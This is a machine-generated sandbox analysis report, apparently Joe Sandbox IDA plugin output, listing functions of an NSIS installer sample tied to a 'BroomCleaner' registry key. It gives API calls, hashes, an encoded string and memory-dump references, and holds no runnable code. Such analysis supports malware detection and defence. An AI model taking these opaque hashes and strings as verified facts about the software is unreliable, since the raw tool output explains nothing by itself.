                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: File$Create$AllocAttributesCharCountDestroyGlobalModuleNamePrevReadSizeTickWindowlstrcpynlstrlen
                                                                                                                                                                                                                                  • String ID: @$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                                                                                                                                                                                  • API String ID: 3119619987-3242305175
                                                                                                                                                                                                                                  • Opcode ID: 4fc0a7fd32f7e4debefb30af515cdd6f92a2255b0d2dd10cb1272751b383b930
                                                                                                                                                                                                                                  • Instruction ID: b38f96b7e78b57fcd3b2806388120572df800b880dbb1f433db2e5bcd9a6e09c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4fc0a7fd32f7e4debefb30af515cdd6f92a2255b0d2dd10cb1272751b383b930
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1791A4B09083048FD720AF29D98576EBBF4EF84318F41847EE584A7291D77C9985CF9A
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CompareFileTime.KERNEL32(?,00000000), ref: 00401BA1
                                                                                                                                                                                                                                    • Part of subcall function 00407CB6: lstrcpynA.KERNEL32(?,?,?,?,?,?,00404457), ref: 00407CD1
                                                                                                                                                                                                                                    • Part of subcall function 00407836: MessageBoxIndirectA.USER32 ref: 00407899
                                                                                                                                                                                                                                    • Part of subcall function 00406FCB: SetWindowTextA.USER32 ref: 00407061
                                                                                                                                                                                                                                    • Part of subcall function 00406FCB: SendMessageA.USER32 ref: 004070A1
                                                                                                                                                                                                                                    • Part of subcall function 00406FCB: SendMessageA.USER32 ref: 004070CF
                                                                                                                                                                                                                                    • Part of subcall function 00406FCB: SendMessageA.USER32 ref: 004070EE
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Message$Send$CompareFileIndirectTextTimeWindowlstrcpyn
                                                                                                                                                                                                                                  • String ID: 62lP/4uOUYfKA3tfxllnPzQXGLJgRjFKHZbIa8JtXF+oMlF4/GglqDQr8FrkYyAg2UYkxW9kefTa$Installed$SOFTWARE\BroomCleaner
                                                                                                                                                                                                                                  • API String ID: 645384303-3819460243
                                                                                                                                                                                                                                  • Opcode ID: 79a18232532a1a7469df17609bd74b415ce06eee5835288b4c7b757715615148
                                                                                                                                                                                                                                  • Instruction ID: b5f2e25a14bd4d2b29e972ea4905dfdb01325226fa6e36a277c804736715cb88
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 79a18232532a1a7469df17609bd74b415ce06eee5835288b4c7b757715615148
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 71614FB09087009ED710BF65CA45A6FBAF8EF80714F018A2FF4C4A7291D77C58818B6B
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
Similarity
• API ID: File$Read$PointerWrite
• String ID: PB@
• API String ID: 2113905535-661560245
• Opcode ID: c65ee0b9422e546ce60fc59843fb5b504002c352310d15ee9ec7ff5b6d871d70
• Instruction ID: 6b6e275f29c4804299ca632934389f045b276b78e87a5faa28d99019ded5aa05
• Opcode Fuzzy Hash: c65ee0b9422e546ce60fc59843fb5b504002c352310d15ee9ec7ff5b6d871d70
• Instruction Fuzzy Hash: DC41FAB0A043059FDB10DF69C98479EBBF4FF84355F50893AE854A3290D378D9458B9A
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

[Control-flow graph image not reproduced; function at 402853, basic blocks 402853 through 403842; API calls in graph: LoadLibraryExA, GetModuleHandleA, GetProcAddress, FreeLibrary; subcalls to 401400 (twice), 40163b, 406fcb, 404a27]
APIs
Strings
• 62lP/4uOUYfKA3tfxllnPzQXGLJgRjFKHZbIa8JtXF+oMlF4/GglqDQr8FrkYyAg2UYkxW9kefTa, xrefs: 00402914
Memory Dump Source
• Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmp
Similarity
• API ID: Library$AddressFreeHandleLoadModuleProc
• String ID: 62lP/4uOUYfKA3tfxllnPzQXGLJgRjFKHZbIa8JtXF+oMlF4/GglqDQr8FrkYyAg2UYkxW9kefTa
• API String ID: 1437655972-244690609
• Opcode ID: ee53454a27184b2d5a0a5c0d2de0908f6b395ec73dedb038415951f2cacf38c2
• Instruction ID: b62c106c84180e177253e802d98a0aa7ea229c7caaf607f5dbea50c10e3e4377
• Opcode Fuzzy Hash: ee53454a27184b2d5a0a5c0d2de0908f6b395ec73dedb038415951f2cacf38c2
• Instruction Fuzzy Hash: AB3170B16083009FD710AF25C94876EBBE8BF84764F51893FE485A32D0D7788986DB5A
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

[Control-flow graph image not reproduced; function at 40820e, basic blocks 40820e through 408296; API calls in graph: GetSystemDirectoryA, wsprintfA, LoadLibraryExA]
APIs
Strings
Similarity
• API ID: DirectoryLibraryLoadSystemwsprintf
• String ID: \$C@
• API String ID: 2200240437-1790911818
• Opcode ID: c9660503d559c2df304355e59e8a4c4b93ddf83edb93a1dccef26b9b85dfc474
• Instruction ID: 6c0f10e39fe67b0a46f2467a814b7d530fefee384e0f0f9ebaf92f9caf306ff0
• Opcode Fuzzy Hash: c9660503d559c2df304355e59e8a4c4b93ddf83edb93a1dccef26b9b85dfc474
• Instruction Fuzzy Hash: 3D014BB1508704AFD300EF68D98879EBBF4FB84308F54C83DD08996295D7789589CB5A
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

[Control-flow graph image not reproduced; function at 408299, basic blocks 408299 through 4082e8; API calls in graph: GetModuleHandleA, GetProcAddress; subcall to 40820e]
APIs
• GetModuleHandleA.KERNEL32(?,?,004043E5), ref: 004082AE
• GetProcAddress.KERNEL32 ref: 004082DA
  • Part of subcall function 0040820E: GetSystemDirectoryA.KERNEL32 ref: 00408229
  • Part of subcall function 0040820E: wsprintfA.USER32 ref: 00408270
  • Part of subcall function 0040820E: LoadLibraryExA.KERNEL32 ref: 00408289
Strings
Similarity
• API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
• String ID: UXTHEME$C@$C@
• API String ID: 2547128583-1808485004
• Opcode ID: f6ce91f65d8d9bb7ee18f4d542f9107f4d6a72ffda61794c9569e264c57c3d17
• Instruction ID: 23c7ce911dd590b504e17f07e60dbba2231cf2c7d4590c8d4e2d2ec4458658d6
• Opcode Fuzzy Hash: f6ce91f65d8d9bb7ee18f4d542f9107f4d6a72ffda61794c9569e264c57c3d17
• Instruction Fuzzy Hash: 8AF08275A00A089BD710AF65D98446FBBF8FB88750B01C47DF98493324EA3499608B9A
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

[Control-flow graph image not reproduced; function at 402613, basic blocks 402613 through 403842; API calls in graph: WaitForSingleObject, GetExitCodeProcess, CloseHandle; subcalls to 401400, 406fcb, 407779, 408848, 407be3, 40163b]
APIs
  • Part of subcall function 00406FCB: SetWindowTextA.USER32 ref: 00407061
  • Part of subcall function 00406FCB: SendMessageA.USER32 ref: 004070A1
  • Part of subcall function 00406FCB: SendMessageA.USER32 ref: 004070CF
  • Part of subcall function 00406FCB: SendMessageA.USER32 ref: 004070EE
  • Part of subcall function 00407779: CreateProcessA.KERNEL32 ref: 004077D6
  • Part of subcall function 00407779: CloseHandle.KERNEL32 ref: 004077EB
• WaitForSingleObject.KERNEL32 ref: 00402661
• GetExitCodeProcess.KERNEL32 ref: 00402688
  • Part of subcall function 00408848: PeekMessageA.USER32 ref: 00408878
  • Part of subcall function 00408848: DispatchMessageA.USER32 ref: 00408884
• CloseHandle.KERNEL32 ref: 004026C8
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
Similarity
• API ID: Message$Send$CloseHandleProcess$CodeCreateDispatchExitObjectPeekSingleTextWaitWindow
• String ID: d
• API String ID: 3753073698-2564639436
• Opcode ID: 9343e43865e4207d9138f12a8f752cf886ae069070fe727ca0ca3e2bbeffcac1
• Instruction ID: ac6e98feb3a7424ea682bb54f7c96fcb1bdc6a13fb689d46f8fa2a7810285b5b
• Opcode Fuzzy Hash: 9343e43865e4207d9138f12a8f752cf886ae069070fe727ca0ca3e2bbeffcac1
• Instruction Fuzzy Hash: 4C218171908600DFD750AF25CD48BAEB7E5EB84315F51887EE489A3380D6795981CF2A
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• GetTickCount.KERNEL32 ref: 00403B7B
  • Part of subcall function 00403B31: SetFilePointer.KERNEL32 ref: 00403B56
• SetFilePointer.KERNEL32 ref: 00403BCB
  • Part of subcall function 00403AE9: ReadFile.KERNEL32 ref: 00403B15
• WriteFile.KERNEL32 ref: 00403CB8
• SetFilePointer.KERNEL32 ref: 00403D2F
  • Part of subcall function 004039FE: DestroyWindow.USER32 ref: 00403A17
Memory Dump Source
• Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
Similarity
• API ID: File$Pointer$CountDestroyReadTickWindowWrite
• String ID:
• API String ID: 1725291646-0
• Opcode ID: 18ae4545f5b30c3c28caf4f3d11ae2cad8807af871cef0b76668dc3cb6943506
• Instruction ID: f7083fb0e86bb6005b9bf14dc6a8331a2f5849a6e81c63e88d49bae7df8a1a75
• Opcode Fuzzy Hash: 18ae4545f5b30c3c28caf4f3d11ae2cad8807af871cef0b76668dc3cb6943506
• Instruction Fuzzy Hash: D3514AB1A183049FD720DF29E88532A7BB4FF44355F90893EE844A72A0D7789546CF9E
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
Memory Dump Source
• Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
Similarity
• API ID: ErrorLast$CreateDirectoryFileSecurity
• String ID:
• API String ID: 3449924974-0
• Opcode ID: 2da82589d8da42b9739c6c0976e1894f0ad9be4ebc54cecaf41c4c862e70e725
• Instruction ID: 0b729d7567636c09f29e4728680a85774f46e6e2b236e770b8bd2138b4be8b02
• Opcode Fuzzy Hash: 2da82589d8da42b9739c6c0976e1894f0ad9be4ebc54cecaf41c4c862e70e725
• Instruction Fuzzy Hash: 0B110CB1D04208DEDB109FA9D8447DEBFB4EF94354F10882AE944B7250D3796545CBAE
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
Memory Dump Source
• Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
Similarity
• API ID: Global$AllocFree
• String ID:
• API String ID: 3394109436-0
• Opcode ID: cd7b7cc6089db85a917c869ea418fe9b4336126d354651c2af7450458f0d2819
• Instruction ID: 73a589aadd6280c1d4df6f0517975a2c4eda39665482ce8a8b3e558a14f083aa
• Opcode Fuzzy Hash: cd7b7cc6089db85a917c869ea418fe9b4336126d354651c2af7450458f0d2819
• Instruction Fuzzy Hash: FD32CF75E04269CFEB64CF28C940BA9BBB2BB48300F1581EAD889B7381D7745E85CF55
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
• Executed
• Not Executed
Control-flow graph (rendered graph data; only the recoverable summary is kept): entry block 4093bf-4093c6, basic blocks spanning 408a9f-409b10. Blocks calling APIs: 408b69-408b90 GlobalAlloc, 408b4d-408b63 GlobalFree, 408c55-408c76 GlobalAlloc, 408c45-408c54 GlobalFree.
Memory Dump Source
• Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 96471980e818e90389b8f28b0725736ff68ec6d8f08f1ae4e00d8e9b25cb3d10
• Instruction ID: 2ff6cda69edbaac919d86c53bc6808f5f303a55c6bc0211467f0ef21a37139c8
• Opcode Fuzzy Hash: 96471980e818e90389b8f28b0725736ff68ec6d8f08f1ae4e00d8e9b25cb3d10
• Instruction Fuzzy Hash: A7229B74E05269CBEB64CF18C980BA9BBB2BB48300F1482EAD84DB7381D7345E85CF55
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
• Executed
• Not Executed
Control-flow graph (rendered graph data; only the recoverable summary is kept): entry block 40893d-408965, basic blocks spanning 408a9f-409b10. Blocks calling APIs: 408b69-408b90 GlobalAlloc, 408b4d-408b63 GlobalFree, 408c55-408c76 GlobalAlloc, 408c45-408c54 GlobalFree.
APIs
Memory Dump Source
• Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
Similarity
• API ID: Global$AllocFree
• String ID:
• API String ID: 3394109436-0
• Opcode ID: 40efa2268de9016f5e6645c0c9238ed231c7493705202486a25610001e8f553c
• Instruction ID: 196290a36a957acb70ae20b533fcf0c155bb910872d15f7e614b6225c37c67e6
• Opcode Fuzzy Hash: 40efa2268de9016f5e6645c0c9238ed231c7493705202486a25610001e8f553c
• Instruction Fuzzy Hash: 05026CB4D05268CFDBA4CF68C980B99BBF1BB48300F1082EAD959A7342D7349E85CF55
Uniqueness
• Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00407935: CharNextA.USER32(?,00000000,74DF3160,?,00408184,?,?,?,00000000,?,004085CF), ref: 0040794A
  • Part of subcall function 00407935: CharNextA.USER32(74DF3160,?,00408184,?,?,?,00000000,?,004085CF), ref: 00407952
• SetCurrentDirectoryA.KERNEL32(00000000,00000000), ref: 00401930
  • Part of subcall function 004078A4: CharNextA.USER32 ref: 004078BE
• GetFileAttributesA.KERNEL32 ref: 004018E0
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CharNext$AttributesCurrentDirectoryFile
                                                                                                                                                                                                                                  • String ID: \
                                                                                                                                                                                                                                  • API String ID: 15404496-2967466578
                                                                                                                                                                                                                                  • Opcode ID: d78038b2043e385ee061b609f29dc6a012e38869a8f0274da12750c867810de6
                                                                                                                                                                                                                                  • Instruction ID: b3c069ff8fe5fca2169c100ba5b4309268a8952e4838bd2cd3cdfa24001796cc
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d78038b2043e385ee061b609f29dc6a012e38869a8f0274da12750c867810de6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E22196B19087419ED7107F2A8C4476ABBE8AF41314F15897FE4D5A33E1D63D4581CB2B
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00407CB6: lstrcpynA.KERNEL32(?,?,?,?,?,?,00404457), ref: 00407CD1
  • Part of subcall function 00407935: CharNextA.USER32(?,00000000,74DF3160,?,00408184,?,?,?,00000000,?,004085CF), ref: 0040794A
  • Part of subcall function 00407935: CharNextA.USER32(74DF3160,?,00408184,?,?,?,00000000,?,004085CF), ref: 00407952
• lstrlenA.KERNEL32(?,00000000,?,?,?,00000000,?,004085CF), ref: 004081BE
• GetFileAttributesA.KERNEL32(00000000,?,?,00000000,?,?,?,00000000,?,004085CF), ref: 004081F7
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
Similarity
• API ID: CharNext$AttributesFilelstrcpynlstrlen
• String ID: C:\
• API String ID: 3248276644-3404278061
• Opcode ID: 2da7ec1753567bed1e155ededaacee0951334442434f81bdc17e756d419ccca8
• Instruction ID: a4b91be4712b2a5abe4fc9de88cdddcc6cd402f2cf4946f98fb9fcd9c72e04c7
• Opcode Fuzzy Hash: 2da7ec1753567bed1e155ededaacee0951334442434f81bdc17e756d419ccca8
• Instruction Fuzzy Hash: D6118FB0508314AAD710ABA69A4167A7BD89F05354F46447FECC0AA285CB3C5852866F
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
Similarity
• API ID: MessageSend
• String ID: 0u
• API String ID: 3850602802-3203441087
• Opcode ID: 0f8c1266bbb926ccc1bd59e027622b1526ca312be5caf6883b3757b9e2fe7e12
• Instruction ID: 587040a18b5e8d3ddabbac84dae9583a5ca4581ff6aa0f06bd791ecb2da4f76d
• Opcode Fuzzy Hash: 0f8c1266bbb926ccc1bd59e027622b1526ca312be5caf6883b3757b9e2fe7e12
• Instruction Fuzzy Hash: 2811B172A043009FC710BF29D88911BBFE8EB40351F50C67EF854A73A0E338D6058B99
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmp
